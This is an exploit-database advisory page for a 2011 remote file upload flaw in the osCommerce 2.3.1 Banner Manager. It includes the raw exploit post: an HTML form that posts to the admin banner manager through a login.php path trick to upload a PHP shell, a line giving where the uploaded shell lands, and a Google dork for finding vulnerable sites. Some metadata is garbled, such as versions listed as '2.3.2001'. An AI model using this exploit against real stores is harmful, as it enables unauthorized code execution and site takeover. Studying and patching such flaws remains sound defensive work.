OSC 2.3.1: Remote File Upload Vulnerability : Banner Manager

vendor:

OSCommerce

by:

Number 7

8.8

CVSS

HIGH

Remote File Upload Vulnerability

434

CWE

Product Name: OSCommerce

Affected Version From: 2.3.2001

Affected Version To: 2.3.2001

Patch Exists: Yes

Related CWE: N/A

CPE: oscommerce

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Apache, Windows, Mac OS

2011

OSC 2.3.1: Remote File Upload Vulnerability : Banner Manager

A vulnerability exists in OSC 2.3.1 which allows an attacker to upload a malicious file to the server. By exploiting this vulnerability, an attacker can upload a malicious file to the server and execute arbitrary code. The vulnerability is due to insufficient validation of the uploaded file. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request containing a malicious file to the vulnerable server.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.

Source

Exploit-DB raw data:

# Exploit Title: [OSC 2.3.1: Remote File Upload Vulnerability : Banner Manager]
# Google Dork: [powered by oscommerce]  (we will automatically add these to the GHDB)
# Date: [13-05-2011]
# Author: [Number 7]
# Software Link: [http://www.oscommerce.com/ext/oscommerce-2.3.1.zip]
# Version: [2.3.1]
# Tested on: [Linux-apache-win03-mac Os .... ]
# CVE : [if exists]
_______________________________________________________________________________________

<form name="new_banner" action="http://site/path/admin/banner_manager.php/login.php?action=insert" method="post" enctype="multipart/form-data"><br>
<input type="file" name="banners_image"><br>
<input name="submit" value=" Save " type="submit"></form>

you will find your shell in

http://site/path/images/yourshell.php

_______________________________________________________________________________________
Greetz: Ares-xGeek-allen-s man-SWAT-SPAM-TN // Tn-Hackers
Site:   Top-sec.com/vb // arhack.net/vb